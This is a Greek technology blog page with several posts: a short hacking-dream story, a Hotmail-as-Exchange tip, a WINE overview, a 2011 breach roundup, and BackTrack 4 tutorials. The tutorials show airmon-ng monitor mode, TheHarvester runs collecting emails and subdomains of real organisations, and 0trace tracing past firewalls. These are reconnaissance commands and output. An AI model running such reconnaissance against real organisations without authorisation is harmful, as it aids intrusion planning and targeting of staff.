Blackman's Content - autoexec.gr

War games!

By Blackman, October 13, 2011

Ώρα 11:43 το βράδυ. Τα φώτα είναι κλειστά και τα μάτια κλείνουν από την νύστα. Σκέφτομαι να κλείσω τον υπολογιστή και να ξαπλώσω, αλλά εκείνη την στιγμή πέφτει το μάτι μου σε κάτι ενδιαφέρον. Κάποιος αναφέρει ότι πρέπει να σπάσει τον ‘keykeeper’.
Στην αναζήτηση μου συγκλωνίζομαι και η αδρεναλίνη αρχίζει να ανεβαίνει. Βρίσκομαι συνδεδεμένος στο σύστημα του ποιο μεγάλου και επικίνδυνου καρτέλ ναρκωτικών του Μεξικού. Με την αδρεναλίνη στα ύψη, κοιτάζω μέσα στο σκοτεινό δωμάτιο μου κλεφτές ματιές σε κενά σημεία, νιώθωντας σαν να με παρακολουθεί κανείς.
Βρίσκω στοιχεία ότι μία νέα μεγάλη παράδωση ναρκωτικών πρόκειται να γίνει στις Ηνωμένες Πολιτείες και εκει αναρωτιέμαι “Blackman σύνελθε…άσε αυτά τα πράγματα στην ησυχία τους”. Και θα τα παρατούσα λίγο πριν πέσω πάνω σε κάτι ‘άκυρες’ εικόνες. Φωτογραφίες με λουλούδια, αρχεία που τα βρίσκεις σε υπολογιστή σπιτιού και όχι σε κάτι τέτοιο.
Αυτομάτως το μυαλό μου πήγε μερικά χρόνια πίσω στο Cybercrime Security Forum που είχε οργανώσει το autoexec.gr το 2008. Και τότε μου ήρθε…
“Λες αυτές οι άκυρες φωτογραφίες να έχουν μέσα τους κάποιο μύνημα ή κάποιο κωδικό;”, ξεκίνησα τις διαδικασίες που μας είχαν δείξει τότε για την αποκρυπτωγράφηση ενός τέτοιου αρχείου. Το CD με τα προγράμματα το είχα πάντα κοντά μου και τα είχα ξαναδόκιμάσει, οπότε μου ήταν πιο εύκολο από ότι θα περίμενα.
Ένα βήμα πριν από αυτό είχα καταφέρει και είχα τραβήξει σε ένα σημείο στο σύνεφο, ένα αρχείο που φαινόταν ‘κλειδί’. Ναι αυτό ήταν ο ‘keykeeper’. Ο keykeeper ήταν ένα αρχείο που δεν ήταν για φτιαγμένο για να τρέχει σε Windows, αλλά το βρήκα μέσα σε Windows σύστημα. Με αυτό το κλειδί στα χέρια έπεσα πάνω στα Images και έτσι έκανα και εκεί την διαδικασία και είχα ένα κωδικό ακόμα.
Τον τελευταίο; Δεν ήξερα. Η ώρα είχε πάει 4 το πρωί και η αδρεναλίνη ήταν τέτοια που μου είχε φανεί λες και πέρασαν λίγα λεπτά. Φοβόμουν…φοβόμουν πολύ. Ήξερα ότι είχα κάνει ότι ξέρω για να κρυφτώ προς τον έξω κόσμο, αλλά αν κάποιος εκείνη την στιγμή ήταν στο traceback τότε ίσως να με έβρισκε και με την Μαφία δεν παίζεις. Μπαμ…και κάτω…
Έψαξα και δεν έβρισκα τι να κάνω αυτό τον κωδικό. Πήγα πάλι σε εκείνο το site και ρώτησα… “που σε οδηγεί η εύρεση του κωδικού μετά τον keykeeper” και η απάντηση άμεση και σοκαριστική ίσως για μερικούς. “Είναι το κλειδί αποκρυπτογράφισης του συστήματος ασφαλείας των τηλεπικοινωνιών τους. Με αυτό κάποια πράγματα δεν θα φτάσουν ποτέ στον προορισμό τους. Αλλά για να το βρεις αυτό πρέπει να είσαι καλύτερος από τους IT Engineers που το έφτιαξαν”.
Έμεινα άφωνος…και εκείνη την στιγμή χτυπάει το κινητό μου και ακούω σε αγγλικά με προφορά λατίνου. “You are dead amigo”!
…
πετάχτηκα…κοίταξα τριγύρω…το κινητό μου δεν ήταν στα χέρια μου αλλά λίγο πιο δίπλα…ανακούφιση…με είχε πάρει ο ύπνος στο γραφείο, μπροστά στον υπολογιστή. Χαμογέλασα και ένιωσα χαζός…σήκωσα τα μάτια και κοίταξα την οθόνη και εκεί έγραφε…
WARGAMES!

Περισσότερες λεπτομέριες? click the image above

Read more...
1 comment
1418 views

Hotmail στο κινητό… ως Microsoft Exchange…και ΟΧΙ pop3

By Blackman, June 23, 2011

Επειδή έχω καταλάβει ότι αρκετοί δεν το γνωρίζουν και από συνήθεια ρυθμίζουν το hotmail τους σαν POP3, θα ήθελα να τους ενημερώσω ότι μπορούν να ξεφύγουν από αυτό και να το ρυθμίσουν ως Microsoft Exchange.
το μοναδικό που πρέπει να βάλετε είναι όταν σας ζητήσει τον server
m.hotmail.com και το full email account σας στο Username

στην συνέχεια έχετε πλήρη πρόσβαση στο email σας με όλους τους υποφακέλους και όλη την δομή, καθώς επίσης και αντίστοιχα τις επαφές σας και το ημερολόγιο σας. Συνεπώς τέλος και στα unread emails που ήδη έχετε διαβάσει από τον υπολογιστή σας κλπ.
Enjoy

Read more...
5 comments
2071 views

Το Κρασί Δεν Είναι Εξομοιωτής ! ! ! !

By Blackman, January 28, 2009

Το Κρασί Δεν Είναι Εξομοιωτής !!!!
Πω, πω... φανταστείτε πόσο κρασί πρέπει να έχει πιει κάποιος για να πει μία τέτοια έκφραση.
Όχι δεν έχω πιει, αλλά αυτό είναι το όνομα εφαρμογής του Linux για να εκτελούνται Windows Εφαρμογές.

Το όνομα αυτής είναι WINE και όχι Wine...γιατί όπως λένε και εκείνοι που το έφτιαξαν το WINE σημαίνει "Wine Is Not an Emulator".

Η εφαρμογή αυτή δεν είναι καινούρια (1993 - Windows 3.1), αλλά είναι ένα Project που στην πορεία στηρίχθηκε από τις εταιρείες CodeWeavers, TransGaming, Corel, Macadamian και Google, πριν μερικά χρόνια, με σκοπό την δυνατότητα εκτέλεσης εφαρμογών windows, κάτω από περιβάλλον Linux.

Φυσικά μιλάμε για μία free of charge εφαρμογή και σκοπό έχει (κατά την προσωπική μου άποψη) να σας κρατήσει σε άμεση επαφή με το Linux & τα Windows.

Πρόσφατα έφτασε στην πρώτη επίσημη version 1 (τώρα μπορείτε να κατεβάσετε την 1.1.13) όπου η Corel ανακοίνωσε πριν κάμποσους μήνες την πλήρη λειτουργικότητα του Photoshop μέσω του WINE.

Η λίστα με τις εφαρμογές που υποστηρίζει είναι μεγάλη και σχετίζετε με τις ποιο διαδεδομένες εφαρμογές και παιχνίδια που κυκλοφορούν.

Υπάρχει μία σχετική λίστα μπορείτε να δείτε εδώ (289 σελίδες με εφαρμογές είναι αρκετές με εφαρμογές και πληροφορίες για compatibility με το WINE). Αυτή είναι λίστα με τις εφαρμογές που έχουν ασχοληθεί, έχοντας επιτυχή ή όχι αποτελέσματα. Σας βοηθάει όμως να δείτε αν η εφαρμογή που θέλετε να τρέξετε παίζει ή όχι σε linux μέσω WINE. Κάποιες από αυτές τις εφαρμογές για παράδειγμα είναι και οι παρακάτω:

.NET Framework Software Development Kit (SDK)
Nero Burning Rom
Alcohol 120%
Active Directory Users and Computers

MSDN Academic Alliance Downloader
Windows Antivirus 2009
Windows Server Update Services
Windows Vista Ultimate Upgrade
NetBeans 5.0
Oracle Forms
Oracle Reports
κλπ.
Για παράδειγμα θα δείτε ότι η αναφορά που υπάρχει για το 'Active Directory Users and Computers' λέει,

What works
Nothing. Installation fails.

What does not
Everything. Installation fails.

What was not tested
Everything. Installation fails.

Additional Comments

Installation partially completes, but no all .msc files return "access denied" error.

Test Results

Distribution Test date Wine version Installs? Runs? Rating Submitter Current Ubuntu
6.10 "Edgy" (+ variants like Kubuntu) Mar 07 2007 0.9.32. No Not installable Garbage an anonymous user Show Ubuntu
5.10 "Breezy" (+ variants like Kubuntu) Apr 04 2006 0.9.11. No Not installable Garbage Travis Collins Show Ubuntu
5.10 "Breezy" (+ variants like Kubuntu) Mar 30 2006 0.9.10. No Not installable Garbage Travis Collins
----
αλλά αυτή η αναφορά είχε γίνει αρκετά παλιά, οπότε και υπάρχει και η σημείωση στην αρχή που λέει

Old test results
The test results for this version are very old, and as such they may not represent the current state of Wine. Please consider submitting a
new test report.

-------------------

Παρόλα αυτά στις εφαρμογές που δουλεύουν 100% απροβλημάτιστα θα βρείτε:

Photoshop CS2, other versions too but not CS3 - Platinum and Gold
Half Life 2 - Platinum Counter Strike
ACDSee - Platinum
Command and Conquer - Gold
Microsoft Office 2003 - Silver
Call of Duty - Gold Προσωπικά έτυχε και δούλεψα για μία περίοδο στην εταιρεία με Linux, λόγο ότι 'χτύπησαν' τα windows και δεν είχα χρόνο να ασχοληθώ για να τα φτιάξω και είχα σε άλλο partition το Ubuntu.
Με το WINE έλυσα αρκετά από τα προβλήματα μου σε κάποιες εφαρμογές και μπορούσα και έκανα και administration στο δίκτυο.

Υπάρχει σχετικό FAQ στην σελίδα του WINE

Για εγκατάσταση...

UBUNTU

Video

Αυτός είναι ένας τρόπος για να δουλέψετε Windows Εφαρμογές, όταν δεν έχετε διαθέσιμα τα αγαπημένα σας Windows.

Φυσικά προγράμματα που κάνουν αυτή την δουλειά, δεν είναι μόνο το WINE, αλλά υπάρχουν και άλλες όπως το CrossOver.
Απλά το WINE είναι ένα project άξιο αναφοράς και δωρεάν, εν αντιθέσει με τους αντιπάλους του.

Αξίζει να το δοκιμάσετε...αλλά μετά μην οδηγήσετε!
----------

Read more...
4 comments
931 views

Hack-in Gate…

By Blackman, June 23, 2011

SONY… pwn3d
Nintendo… pwn3d
Square Enix… pwn3d
Epic Games… pwn3d
SEGA… pwn3d

Ντου από παντού φαίνεται ότι δέχονται οι εταιρείες που κοινό τους στοιχείο είναι οι παιχνιδομηχανές ή τα παιχνίδια και φυσικά η βάση δεδομένων με τα στοιχεία εκατομυρίων χρηστών τους. Ένα ακόμα σημείο είναι ότι οι hackers χτυπάνε…και τα παίρνουν ΟΛΑ και φεύγουν.
Τελευταίο θύμα η SEGA όπου έκλεψαν τα στοιχεία 1,3 εκατομμυρίων παικτών της μαζί με κωδικούς και άλλα προσωπικά στοιχεία. Ευτυχώς αυτή την φορά δεν πήραν και τα στοιχεία των πιστωτικών καρτών. Το πήραν χαμπάρι την περασμένη Παρασκευή και έκλεισαν αμέσως το σύστημα για να μην έχουν άλλη διαρροή. Μέχρι και την Δευτέρα το site της ήταν ‘κάτω’ με το εξής μήνυμα:
"Sega Pass is going through some improvements so is currently unavailable for new members to join or existing members to modify their details including resetting passwords. We hope to be back up and running very soon. Thank you for your patience."
Από πλευράς hackers δεν έχει αναλάβει ακόμα την ευθύνη κανείς και η ομάδα Luiz Security ανέφερε ότι δεν είχε καμία σχέση με το συγκεκριμένο γεγονός. Εν αντιθέσει έκαναν post στον λογαριασμό τους στο twitter το παρακάτω:
"We want to help you destroy the hackers that attacked you. We love the Dreamcast, these people are going down,"
Αλλά αυτό είναι η μία μορφή επιθέσεων που έχουμε αντιμετωπίσει μέχρι στιγμής και φυσικά αναλύθηκε διεξοδικά και στο πρόσφατο AthCon. Όλα γίνονται για τα λεφτά και να δούμε ποιος θα πουλήσει αυτά τα στοιχεία που…
Αλλά αν αυτό το θεωρείτε κακό… τι να πουν και στην Αυστραλία…
όπου 4800 ιστοσελίδες ΔΙΑΓΡΑΦΗΣΑΝ παντελώς από τον ηλεκτρονικό χάρτη, χωρίς ΚΑΜΙΑ πιθανότητα επαναφοράς. Γιατί; Γιατί οι hackers κατάφεραν και χτύπησαν έναν καταχωρητή domain που έκανε και web hosting με όνομα Distribut.IT. Η ζημιά ήταν τόσο μεγάλη, καθώς 4 servers κρίνονται ότι είναι UNRECOVERABLE, βάση αναφορών. H Distribute.IT προσπαθεί να επαναφέρει όσα στοιχεία μπορεί, αλλά αυτό είναι δύσκολο καθώς οι hackers έσβησαν ΟΧΙ μόνο τα δεδομένα, αλλά και βασικά backups, snapshots και άλλες πληροφορίες που θα βοηθούσαν στην επαναφορά των δεδομένων.
Έτσι οι πελάτες της εν λόγο εταιρείας πρέπει να στήσουν τα site τους από την αρχή. Ενώ επίσης η Distribut.IT δεν έχει δώσει πλήρη αναφορά για το χτύπημα, ώστε να βεβαιώσει τις εταιρείες για το τι ακριβώς έχει συμβεί και τι στοιχεία πιθανόν να έχουν κλαπεί.
Μιλάμε πλέον για ηλετρονικό πόλεμο ή μόνο για ηλεκτρονικό έγκλημα;

Read more...
2 comments
1481 views

back|track 4 : (lesson 1) networking

By Blackman, August 11, 2010

Αρχικά να αναφέρουμε ότι το backtrack μπορείτε να το χρησιμοποιήσετε τόσο σαν Live CD ή να δημιουργήσετε ένα Live USB, είτε να το κάνετε εγκατάσταση σε κάποιον υπολογιστή ή laptop, αλλά ακόμα να κατεβάσετε έτοιμο και ένα VMware virtual machine. Όλα αυτά είναι διαθέσιμα στην σελίδα http://www.backtrack-linux.org/downloads/ από όπου μπορείτε να κατεβάσετε αυτό που σας βολεύει καλύτερα.
Που είναι το δίκτυο μου; Οεο;
Ένα από τα χαρακτηριστικά που έχει η νέα έκδοση του backtrack είναι ότι το networking του είναι ανενεργό, σαν μία σωστή security πλατφόρμα που σέβεται τον εαυτό της. Αυτός είναι και ο κύριος λόγος που πάρα πολύ κόσμος που δεν είναι εξοικειωμένος με Linux συστήματα το παρατάει όπως το έπιασε. Γιατί πολύ απλά είναι σαν να έχουν ένα αυτοκίνητο και να μην ξέρουν πώς να το ‘βάλουν εμπρός’.
Στις παλαιότερες εκδόσεις μέχρι και την έκδοση 3, από το networking η κάρτα Ethernet (eth0) ήταν ρυθμισμένη τόσο στο VMware image όσο και στα Live να είναι up and running αυτόματα. Στην νέα έκδοση όμως, παρατήρησα ότι κανένα Interface δεν είναι UP. Στην περίπτωση της ασύρματης κάρτας είναι by default σε κατάσταση monitoring.
Ethernet & Wireless
Προσωπικά πιστεύω ότι η συγκεκριμένη διανομή είναι φτιαγμένη για να δουλεύει σε Laptop, γιατί έχει πολύ όμορφα πράγματα για να κάνεις με την ασύρματη κάρτα δικτύου. Στο παρελθόν θα είχατε διαβάσει σχετικές αναφορές πάνω σε αυτό και γενικότερα στο backtrack στα παρακάτω blog posts μου
http://autoexec.gr/blogs/blackman/archive/2008/11/28/back-to-back-following-your-track-i-m-using-linux-backtrack.aspx
http://autoexec.gr/blogs/blackman/archive/2009/11/30/hack-my-it-pro-connections.aspx
http://autoexec.gr/blogs/blackman/archive/2009/07/05/wifi-cracking.aspx
http://autoexec.gr/blogs/blackman/archive/2009/07/07/back-to-the-track-4.aspx
Να θυμάστε ότι αν η κάρτα σας δεν έχει chipset της atheros, τότε έχετε μία κάρτα που δεν μπορεί να κάνει ούτε Monitoring ούτε να στείλει πακέτα, συνεπώς no wifi cracking for you. Όπως και να έχει πάντως αν δεν είναι atheros, θα αναγκαστείτε να την χρησιμοποιήσετε όπως κάνατε μέχρι τώρα.
ΟΚ. Δεν θέλετε να κάνετε wifi sniffing, ούτε wifi cracking, τίποτα από αυτά. Θέλετε απλά να συνδεθείτε ασύρματα σε κάποιο access point, προφανώς για να έχετε ασύρματο internet και να χρησιμοποιήσετε τα υπόλοιπα όμορφα εργαλεία που υπάρχουν.
Στον κόσμο της Microsoft έχετε μάθει την εντολή ipconfig και την εντολη route. Στον κόσμο του Linux όμως υπάρχουν οι εξής (και δεν είναι οι μόνες)
ip
http://linux-ip.net/gl/ip-cref/
http://linux.about.com/library/cmd/blcmdl8_ip.htm
http://www.cyberciti.biz/faq/howto-linux-configuring-default-route-with-ipcommand/
ifconfig
http://en.wikipedia.org/wiki/Ifconfig
http://linux.die.net/man/8/ifconfig
iwconfig
http://gd.tuwien.ac.at/linuxcommand.org/man_pages/iwconfig8.html
http://www.susegeek.com/wireless/iwconfig-wireless-interface-configuration-utility-in-linux/
Αρχικά τρέχοντας την εντολή ip add θα δείτε κάτι παρόμοιο με αυτό

Στην περίπτωση μου δεν βλέπετε την ασύρματη κάρτα δικτύου (συνήθως wlan0 ή wifi0) λόγω του ότι πρέπει να ρυθμιστεί σχετικά το WMware workstation. Αν δεν γίνει κατανοητό θα φροντίσω να βάλω print screens από το Laptop που έχω κανονική εγκατάσταση.
Συνεχίζοντας στο θέμα μας, θα παρατηρήσετε ότι η eth0 είναι DOWN, αντίστοιχα παίζει να βλέπετε και την ασύρματη κάρτα. Ο τρόπος με τον οποίο ‘σηκώνουμε’ κάποιο Interface είναι με την εντολή ifconfig <όνομα Interface> up
Οπότε η όλη εικόνα που θα έχετε θα είναι κάπως έτσι

Στην περίπτωση του Ethernet βλέπετε ότι το state είναι UNKNOWN ενώ από κάτω δεν μας έχει φέρει κάποια άλλη πληροφορία. Ο λόγος είναι γιατί απλά δεν έχει πάρει IP.
Εκεί τρέχουμε την εντολή dhclient για να αναζητήσει διεύθυνση από κάποιον dhcp. Οπότε θα δείτε κάτι σαν το παρακάτω

Και εκτελώντας πάλι ip add βλέπουμε ότι η κάρτα μας έχει πλέον και διεύθυνση. Οπότε επιβεβαιώνουμε ότι έχουμε σύνδεση.

Το παραπάνω φυσικά ισχύει τόσο αν το Interface είναι της LAN κάρτας μας, αλλά και για την wireless (θα δούμε παρακάτω πως συνδέεται αρχικά πάνω σε κάποιο access point).
Η διαφορά όμως με την Wireless για να γίνουν όλα τα παραπάνω είναι ότι ΔΕΝ ΠΡΕΠΕΙ ΝΑ ΕΙΝΑΙ ΣΕ ΚΑΤΑΣΤΑΣΗ MONITORING (που αναφέραμε ότι είναι από default).
Αυτό το πράγμα είναι απλό και γίνεται με την εντολή airmon-ng (που είναι μέσα στο πακέτο του aircrack-ng).
Βάζουμε την κάρτα σε monitor mode με την εντολή airmon-ng start <όνομα wireless interface>

Ενώ αντίστοιχα την βγάζουμε από Monitor Mode με airmon-ng stop <όνομα wireless interface>

Σε περίπτωση που αντιμετωπίσετε προβλήματα με τα πρώτα βήματα στην ασύρματη κάρτα, πηγαίνετε και σταματήστε monitor mode αν δεν το έχετε κάνει ήδη.
Θα μου πείτε τώρα
-Τι μας λες ρε Blackman; ΟΚ την LAN κάρτα την ανεβάσαμε και πήρε και dhcp, κάτι δεν κολλάει όμως με την Wireless. Πως βρίσκω και πως συνδέομαι σε κάποιο access point; Τι dhclient εντολές μας λες; Αφού δεν έχουμε συνδεθεί κάπου.
Εντάξει. Εφόσον έχετε βεβαιωθεί ότι η κάρτα wifi δεν είναι σε monitor mode και είναι UP τότε εκτελούμε την εντολή iwconfig

Όπου βλέπουμε την κάρτα μας. Με αυτή την εντολή μπορούμε να συνδεθούμε εκεί που θέλουμε και γενικότερα να διαχειριστούμε την κάρτα μας, αλλά μάλλον προτιμάτε κάτι καλύτερο από αυτό.
Στο backtrack θα βρείτε και ένα πιο φιλικό Wired & Wireless Connection Manager. Δεν έχετε να κάνετε κάτι περισσότερο από το να τρέξετε wicd start και είτε πηγαίνετε στα settings να τρέξετε το Connection Manager που πλέον έχει εμφανιστεί, ή αμέσως εκτελείτε wicd-client start (αν δεν τρέχετε το πρώτο, δεν θα εκτελεστεί το δεύτερο).

Οπότε πλέον εμφανίζεται κάτι πιο γνώριμο…

Οι οθονούλες του networking
Μέσω του οποίου μπορούμε να ρυθμίσουμε τόσο την wired όσο και την wireless κάρτα μας.

Φυσικά με το παραπάνω καλύπτεστε και στο θέμα των static ips, καθώς μέσα από τα advanced settings μπορείτε να τα ρυθμίσετε

Γνωρίζοντας τα παραπάνω νομίζω ότι πλέον, όσοι είχαν εκνευριστεί και παρατήσει το backtrack, είναι ευκαιρία να το ξαναπιάσουν. Ετοιμάστε το για να δοκιμάσετε ότι άλλα θα πούμε σε αυτή την σειρά blog posts για το backtrack.
Ελπίζω το συγκεκριμένο να βοηθάει όσους αντιμετώπισαν προβλήματα στο παρελθόν με το συγκεκριμένο θέμα. Stay tuned…
back|track 4 …make it real…

Read more...
5 comments
1266 views

back|track 4 : (lesson 3) Information Gathering: TheHarvester

By Blackman, October 1, 2010

Επόμενο μάθημα στα εργαλεία του Back|Track 4 έχουν να κάνουμε ένα εργαλείο που ονομάζετε The Harvester. Σκοπός του είναι να συλλέξει πληροφορίες όπως λογαριασμοί email, username και hostnames ή subdomains από διάφορες πηγές.
Οι πηγές αυτές είναι οι παρακάτω:
Google – emails,subdomains/hostnames Bing search – emails, subdomains/hostnames Pgp servers – emails, subdomains/hostnames Linkedin – usernames MSN.com – emails, subdomains/hostnames (1.4) Τρέχοντας το πρόγραμμα βλέπουμε το παρακάτω (το printscreen είναι από την PreFinal έκδοση (1.4b έκδοση του TheHarvester) για αυτό δεν βλέπετε στα data source το Bing. Στην νεότερη έκδοση (1.6) έχει προστεθεί, ενώ έχει αφαιρεθεί το MSN – προφανώς λόγο αντικατάστασης με το bing)

Στην τελική έκδοση πρέπει να βλέπεται το παρακάτω στο usage:
10
Usage: theharvester options
11

12
-d: domain to search or company name
13
-b: data source (google,bing,pgp,linkedin)

14
-s: start in result number X (default 0)
15
-v: verify host name via dns resolution

16
-l: limit the number of results to work with(bing goes from 50 to 50 results,
17
google 100 to 100, and pgp does'nt use this option)
Όπως μπορείτε να δείτε, η χρήση του είναι εύκολη. Αλλά ας δούμε μία δοκιμή με το cnn.com
01
root@bt:/pentest/enumeration/google/theharvester# ./theHarvester.py -d cnn.com -l 500 -b bing
02
03
*************************************
04
*TheHarvester Ver. 1.6 *
05
*Coded by Christian Martorella *
06
*Edge-Security Research *
07
*[email protected] *
08
*************************************
09
10
Searching for cnn.com in bing :
11
======================================
12
13
Limit: 500
14
Searching results: 0
15
Searching results: 50
16
Searching results: 100
17
Searching results: 150
18
Searching results: 200
19
Searching results: 250
20
Searching results: 300
21
Searching results: 350
22
Searching results: 400
23
Searching results: 450
24
25
Accounts found:
26
====================
27
28
@cnn.com
29
[email protected]
30
====================
31
32
Total results: 2
33
34
Hosts found:
35
====================
36
37
www.cnn.com
38
edition.cnn.com
39
money.cnn.com
40
sportsillustrated.cnn.com
41
amfix.blogs.cnn.com
42
live.cnn.com
43
news.blogs.cnn.com
44
politicalticker.blogs.cnn.com
45
marquee.blogs.cnn.com
46
weather.cnn.com
47
m.cnn.com
48
transcripts.cnn.com
49
www.cnnstudentnews.cnn.com
50
ac360.blogs.cnn.com
51
campbellbrown.blogs.cnn.com
52
newsource.cnn.com
53
cgi.cnn.com
54
joybehar.blogs.cnn.com
55
topics.edition.cnn.com
56
internationaldesk.blogs.cnn.com
57
us.cnn.com
58
larrykinglive.blogs.cnn.com
59
topics.cnn.com
60
weather.edition.cnn.com
61
cnnwire.blogs.cnn.com
62
scitech.blogs.cnn.com
63
on.cnn.com
64
ricksanchez.blogs.cnn.com
65
archives.cnn.com
66
community.cnn.com
67
sports.si.cnn.com
68
arabic.cnn.com
69
quiz.cnn.com
70
newsroom.blogs.cnn.com
71
cgi.money.cnn.com
72
partners.cnn.com
73
pagingdrgupta.blogs.cnn.com
74
features.blogs.fortune.cnn.com
75
tech.fortune.cnn.com
76
insession.blogs.cnn.com
77
business.blogs.cnn.com
78
behindthescenes.blogs.cnn.com
79
olympics.blogs.cnn.com
80
afghanistan.blogs.cnn.com
81
gdyn.cnn.com
82
premium.cnn.com
83
inthefield.blogs.cnn.com
84
ypwr.blogs.cnn.com
85
premium.edition.cnn.com
86
edition1.cnn.com
87
drgupta.cnn.com
88
edition2.cnn.com
89
wallstreet.blogs.fortune.cnn.com
90
tips.blogs.cnn.com
91
mxp.blogs.cnn.com
Σε αυτή την περίπτωση συνεχίζουμε την αναζήτηση και στις υπόλοιπες μηχανές αναζήτησης για περισσότερα αποτελέσματα. Στο παραπάνω θα παρατηρήσετε ότι μου έφερε μόνο domains/subdomains και όχι emails. Για αυτό όποιος ψάχνει κάτι ίσως το βρει σε άλλη μηχανή αναζήτησης. Όπως μπορείτε να δείτε και λίγο πιο κάτω μία δοκιμή που φέρνει και emails.
01
root@bt:/pentest/enumeration/google/theharvester# ./theHarvester.py -d 53.com -l 500 -b google
02
03
*************************************
04
*TheHarvester Ver. 1.4b *
05
*Coded by Christian Martorella *
06
*Edge-Security Research *
07
*[email protected] *
08
*************************************
09
10
Searching for 53.com in google :
11
======================================
12
13
Limit: 500
14
Searching results: 0
15
Searching results: 100
16
Searching results: 200
17
Searching results: 300
18
Searching results: 400
19
20
Accounts found:
21
====================
22
23
[email protected]
24
@53.com
25
[email protected]
26
@.53.com
27
[email protected]
28
[email protected]
29
[email protected]
30
[email protected]
31
[email protected]
32
[email protected]
33
[email protected]
34
[email protected]
35
====================
36
37
Total results: 12
38
39
Hosts found:
40
====================
41
42
www.53.com
43
reo.53.com
44
direct.53.com
45
premierissue.53.com
46
retire.53.com
47
ir.53.com
48
tdsc.53.com
49
secure.53.com
50
ra.53.com
51
2Fwww.53.com
52
Www.53.com
53
252Fwww.53.com
54
espanol.53.com
55
employee.53.com
56
bnjhz.php?...53.com
57
express.53.com
58
www.ra.53.com
59
Ra.53.com
60
3Dreo.53.com
61
wwww.53.com
62
Retire.53.com
63
@.53.com
64
www.express.53.com
65
mxism.php?...53.com
66
pngyo.php?...53.com
Αρκετά ενδιαφέρον, για κάποιον που ασχολείται με την συλλογή πληροφοριών. Τι λέτε;
http://www.edge-security.com/theHarvester.php
Open Source σημαίνει… -> http://www.edge-security.com/soft/theHarvester.py

Read more...
5 comments
1356 views

back|track 4 : (lesson 2) Information Gathering: 0trace

By Blackman, August 26, 2010

Συνέχεια στα σχετικά άρθρα για το backtrack. Σε αυτό το σημείο θα μιλήσουμε για το 0trace, το οποίο είναι παρόμοιο με την κλασική εντολή tracert (windows) ή traceroute (linux). Οπότε θα μου πείτε, αφού ξέρω αυτές τις εντολές τι θα μου δώσει παραπάνω το 0trace;
Προφανώς έχετε δοκιμάσει αρκετές φορές να κάνετε trace κάποια IP ή κάποιο site και σε κάποια σημεία πέφτετε σε συνεχόμενα “time outs”, πράγμα που σημαίνει ότι στα συγκεκριμένα σημεία προφανώς σας κόβει κάποιο firewall.

Σε αυτό το σημείο έρχεται να διαφοροποιηθεί το 0trace από τις κλασικές εντολές. Το 0trace καταφέρνει και περνάει μέσα από σχεδόν οποιασδήποτε μορφής stateful packet inspection firewall τα οποία είναι και αυτά που μας δίνουν τα “time outs”. Αυτό επιτυγχάνετε με την τοποθέτηση ενός listener από το πρόγραμμα, το οποίο στην συνέχεια περιμένει κάποιας μορφής σύνδεση με την σελίδα ή την διεύθυνση που θέλουμε να κάνουμε trace. Αυτή η σύνδεση μπορεί να είναι είτε μέσω http, είτε telnet ή ότι άλλο μπορεί να δώσει σύνδεση και επικοινωνία με την διεύθυνση που θέλουμε.
Η σύνταξη της εντολής είναι απλή
root@bt:~# /usr/local/sbin/0trace.sh <network interface> <hostname or ip>
δηλαδή στην περίπτωση του autoexec.gr γίνεται ή
root@bt:~# /usr/local/sbin/0trace.sh eth0 autoexec.gr
ή
root@bt:~# /usr/local/sbin/0trace.sh eth0 62.1.45.163

Είναι προτιμότερο να ανακαλύπτετε την IP για να προχωρήσετε στο trace, καθώς οι ειδικοί σας λένε ότι θα έχετε καλύτερα αποτελέσματα.
Έτσι έχοντας χρησιμοποιήσει την εντολή θα δούμε κάτι σαν το παρακάτω

root@bt:~# /usr/local/sbin/0trace.sh wlan0 62.1.45.163
0trace v0.01 PoC by <[email protected]>

[+] Waiting for traffic from target on wlan0...
Έτσι καταλαβαίνουμε ότι ο listener έχει στήσει ‘αυτί’ και περιμένει την επόμενη κίνηση μας. Έτσι αν ανοίξουμε πχ μία σελίδα και μπούμε στο http://autoexec.gr και αποκτήσουμε established connection. Το αποτέλεσμα που θα έχουμε τότε θα είναι κάτι σαν και το παρακάτω

root@bt:~# /usr/local/sbin/0trace.sh wlan0 157.166.255.19
0trace v0.01 PoC by <[email protected]>

[+] Waiting for traffic from target on wlan0...
[+] Traffic acquired, waiting for a gap...

[+] Target acquired: 192.168.1.99:39544 -> 157.166.255.19:80 (2048829642/3092775968).
[+] Setting up a sniffer...

[+] Sending probes...

TRACE RESULTS
-------------

1 192.168.1.1
2 74.133.211.1

3 74.133.33.29
4 74.133.9.229

5 4.59.12.49
6 4.68.103.2

7 4.71.20.14
Target reached.

root@bt:~#
Με την έκδοση του backtrack για Virtual Machine, αυτό ίσως να μην το δείτε έτσι, αλλά να σας βγάλει απευθείας το "Target reached".
Σε γενικές γραμμές δεν θα περιμένετε πάρα πολύ για τα αποτελέσματα, ενώ στην περίπτωση που κάτι δεν πάει καλά θα έχετε ως απάντηση "Probe rejected by target" .
Το πρόγραμμα αυτό φέρεται να είναι έκδοσης 2007 και στις περισσότερες περιπτώσεις δείχνει να δουλεύει σωστά και να φέρνει αποτελέσματα. Αναφέρω την ημερομηνία, καθότι μιλάμε για open source και ίσως κάποια από τα προγράμματα που υπάρχουν μέσα στο backtrack να είναι outdated ή non factional πλέον.

Read more...
1 comment
774 views

Back to the Track 4

By Blackman, July 7, 2009

Δεν έκανα λάθος. Δεν είναι η ταινία Back to the Future. Είναι η πραγματικότητα "Back to the Track". Το είχαμε αναφέρει σε αυτό το Blog στο παρελθόν. Ένα εργαλείο που αξίζει να ασχοληθούν όσοι έχουν την όρεξη καθώς οι πληροφορίες που μπορεί κάποιος να αντλήσει είναι πολλές και ενδιαφέρουσες.

Το Backtrack 3, όπως κάθε σωστή διανομή ή λειτουργικό σύστημα που σέβεται τον εαυτό του, κάνει τον κύκλο του, "πεθαίνει" και "ξαναζεί".

Το Backtrack 4 Pre-Final ήρθε και σε λίγο καιρό έρχεται και η τελική έκδοση του συστήματος. Προσωπικά δουλεύω την beta λίγο καιρό τώρα (δεν έχω δει την Pre-Final ακόμα). Τα περισσότερα εργαλεία που εμπεριέχονται έχουν αναβαθμιστεί στις τελευταίες εκδόσεις και αναμένεται το ίδιο να ισχύει και στην τελική έκδοση. Υπάρχουν κάποια θεματάκια ακόμα, όπως κάποιο debugging που πρέπει να γίνει πχ στο 0trace για να δουλέψει σωστά, αλλά η κοινότητα του Backtrack είναι εδώ για να βοηθήσει και σίγουρα η final version θα δουλεύει απροβλημάτιστα. Όσοι έχουν δουλέψει με την προηγούμενη έκδοση, να είναι έτοιμοι για καλύτερα αποτελέσματα σε όλες τις δοκιμές ή μετρήσεις που θα κάνουν.

